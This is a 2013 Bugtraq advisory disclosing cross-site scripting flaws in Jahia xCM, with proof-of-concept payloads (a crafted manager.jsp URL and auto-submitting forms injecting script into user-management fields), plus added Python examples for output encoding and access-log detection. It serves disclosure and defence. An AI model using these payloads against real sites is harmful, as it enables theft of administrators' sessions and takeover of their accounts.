List: bugtraq
Subject: Multiple XSS Vulnerabilities in Jahia xCM
From: advisory () htbridge ! com
Date: 2013-07-31 10:43:52
Message-ID: 20130731104352.5668B2C4C0CF () htbridge ! ch
Advisory ID: HTB23159
Product: Jahia xCM
Vendor: Jahia Solutions Group SA
Vulnerable Version(s): 6.6.1.0 r43343 and probably prior
Tested Version: 6.6.1.0 r43343
Vendor Notification: June 5, 2013
Vendor Patch: July 17, 2013
Public Disclosure: July 31, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4624
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Jahia xCM, which can be exploited to perform cross-site scripting attacks against the administrator of a vulnerable application.
1) Multiple Cross-Site Scripting (XSS) Vulnerabilities in Jahia xCM: CVE-2013-4624
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in the "site" HTTP GET parameter passed to the "/engines/manager.jsp" script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:
http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
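The root cause is the same in each item of this advisory: a request parameter is written back into the page without being encoded for the context it lands in. The following is an added example, not Jahia's code; its render_* functions and HTML fragments are assumed stand-ins for the JSP pages named here. It shows the inline-script context of 1.1 (the "site" payload closes the script element) and the attribute context used by the form-based items 1.2 and 1.3 (the payload starts with a quote and a closing bracket), each beside its encoded counterpart, and uses Python's html.parser as a simple oracle for whether an extra <script> element appears in the rendered page.

```python
"""Context-aware output encoding for the injection contexts in this advisory.

Added example, not Jahia code. The render_* functions are stand-ins for the
JSP pages the advisory names: one writes the "site" parameter into an inline
<script> block, the other echoes "searchString" into an HTML attribute. The
function names and HTML fragments are assumptions chosen for illustration.
"""
import html
import json
from html.parser import HTMLParser

# Payloads taken from the advisory's proof-of-concept examples (URL-decoded).
SITE_PAYLOAD = "</script><script>alert(document.cookie);</script>"
ATTR_PAYLOAD = "'><script>alert(document.cookie);</script>"


def render_manager_script_vulnerable(site: str) -> str:
    """Bug pattern: raw interpolation into a JavaScript string literal."""
    return f'<script>var site = "{site}";</script>'


def js_string(value: str) -> str:
    """Encode a value for use as a string literal inside an inline <script>.

    json.dumps handles quotes, backslashes and control characters; the extra
    replacement stops the HTML tokenizer from seeing "</script>" inside the
    literal, which is exactly how the "site" payload breaks out.
    """
    return json.dumps(value).replace("</", "<\\/")


def render_manager_script_fixed(site: str) -> str:
    return f"<script>var site = {js_string(site)};</script>"


def render_search_form_vulnerable(search_string: str) -> str:
    """Bug pattern: the previous search term echoed into an attribute unescaped."""
    return f"<input type='text' name='searchString' value='{search_string}'>"


def render_search_form_fixed(search_string: str) -> str:
    # quote=True also escapes ' and ", so the value cannot close the attribute.
    safe = html.escape(search_string, quote=True)
    return f"<input type='text' name='searchString' value='{safe}'>"


class _ScriptCounter(HTMLParser):
    """Counts <script> elements; html.parser treats script content as CDATA
    until a real </script> end tag, much like a browser tokenizer."""

    def __init__(self) -> None:
        super().__init__()
        self.script_elements = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_elements += 1


def count_script_elements(markup: str) -> int:
    """Oracle: how many <script> elements does the rendered page contain?"""
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.script_elements


if __name__ == "__main__":
    for label, page in [
        ("manager.jsp, vulnerable", render_manager_script_vulnerable(SITE_PAYLOAD)),
        ("manager.jsp, fixed", render_manager_script_fixed(SITE_PAYLOAD)),
        ("search form, vulnerable", render_search_form_vulnerable(ATTR_PAYLOAD)),
        ("search form, fixed", render_search_form_fixed(ATTR_PAYLOAD)),
    ]:
        print(f"{label}: {count_script_elements(page)} script element(s)")
```

The encoded manager page still carries the text `<script>alert(...)` inside the JavaScript string literal, but with `</` rewritten as `<\/` the tokenizer never leaves the original script element, so it stays inert data. In a JSP code base the same two roles are played by a context-specific encoder such as the OWASP Java Encoder's forJavaScript and forHtmlAttribute; a single HTML-escaping call is not enough for the script context.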
1.2 The vulnerability exists due to insufficient filtering of user-supplied data in the "searchString" HTTP POST parameter passed to the "/administration/" URI when "do=users" and "sub=search". A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:
<form action="http://[host]/administration/?do=users&sub=search" method="post" name="main">
<input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data in the "username", "manage-user-property#j:firstName", "manage-user-property#j:lastName", "manage-user-property#j:email" and "manage-user-property#j:organization" HTTP POST parameters passed to the "/administration/" URI when "do=users" and "sub=processCreate". A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:
<form action="http://[host]/administration/?do=users&sub=processCreate" method="post" name="main">
<input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="actionType" value='save'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
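For installations that log requests, the three items above leave different traces. The following added example (not part of the advisory and not Jahia code; the hostnames and the log lines are constructed) scans Apache/Tomcat "combined"-format access-log lines. Item 1.1 is visible directly, because the "site" payload travels in the query string of a GET; items 1.2 and 1.3 travel in POST bodies that access logs do not record, so the example flags them only heuristically, by a POST to the user-management actions whose Referer is missing or off-site, which is the delivery path the advisory describes (a form auto-submitted from a page the administrator was lured to).

```python
"""Heuristic access-log detection for the issues in this advisory.

Added example, not part of the advisory or of Jahia. It scans constructed
Apache/Tomcat "combined"-format access-log lines (the samples below are made
up). The first check covers 1.1 directly: a GET to /engines/manager.jsp whose
decoded "site" parameter contains markup. The second covers 1.2 and 1.3 only
indirectly, because access logs do not record POST bodies: a POST to the
user-management actions whose Referer is missing or off-site matches the
delivery vector the advisory describes. Hostnames and log lines are assumed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

TRUSTED_HOSTS = {"cms.example.test"}  # assumed hostname of the Jahia instance

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Anything that could open a tag, close an attribute or carry a script: URL.
MARKUP_RE = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

# Constructed sample log; line 2 carries the advisory's 1.1 payload verbatim.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jul/2013:10:43:52 +0000] "GET /engines/manager.jsp?conf=repositoryexplorer&site=ACME HTTP/1.1" 200 5120 "http://cms.example.test/administration/" "Mozilla/5.0"
203.0.113.7 - - [31/Jul/2013:10:44:10 +0000] "GET /engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 5200 "http://evil.example.test/lure.html" "Mozilla/5.0"
203.0.113.7 - - [31/Jul/2013:10:45:01 +0000] "POST /administration/?do=users&sub=search HTTP/1.1" 200 3100 "http://cms.example.test/administration/?do=users" "Mozilla/5.0"
203.0.113.7 - - [31/Jul/2013:10:45:30 +0000] "POST /administration/?do=users&sub=processCreate HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Jul/2013:10:46:00 +0000] "POST /administration/?do=users&sub=search HTTP/1.1" 200 3100 "http://evil.example.test/lure.html" "Mozilla/5.0"
"""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so %253C is still seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def referer_is_trusted(referer: str) -> bool:
    """A missing Referer ("-") is treated as untrusted for these actions."""
    if referer in ("", "-"):
        return False
    return urlsplit(referer).hostname in TRUSTED_HOSTS


def analyse_line(line: str):
    """Return (finding, client_ip, evidence) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    params = parse_qs(target.query, keep_blank_values=True)
    if m["method"] == "GET" and target.path == "/engines/manager.jsp":
        for site in params.get("site", []):  # parse_qs already decoded once
            if MARKUP_RE.search(fully_decode(site)):
                return ("xss-1.1-manager-site", m["ip"], site)
    if m["method"] == "POST" and target.path == "/administration/":
        sub = params.get("sub", [""])[0]
        if params.get("do") == ["users"] and sub in ("search", "processCreate"):
            if not referer_is_trusted(m["referer"]):
                return ("offsite-post-users-" + sub, m["ip"], m["referer"])
    return None


def scan(log_text: str) -> list:
    """Run analyse_line over every line and keep the findings, in log order."""
    return [hit for hit in map(analyse_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for finding, ip, evidence in scan(SAMPLE_LOG):
        print(f"{finding}\t{ip}\t{evidence}")
```

The Referer heuristic will also fire on administrators whose browsers suppress the header, so treat those hits as a prompt to check the created or searched user records for markup rather than as proof of exploitation; the GET check on "site" is the reliable one.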
-----------------------------------------------------------------------------------------------
Solution:
Apply hotfix 7, that is available to all customers:
https://www.jahia.com/fr/home/support/customers-extranet/enterprise-jahia-downloads/jahia-xcm---version-66.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23159 - https://www.htbridge.com/advisory/HTB23159 - Multiple XSS Vulnerabilities in Jahia xCM.
[2] Jahia xCM - http://www.jahia.com - Jahia xCM is the unified interface to access, personalize and manage best of breed WCM, portal and document management features.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.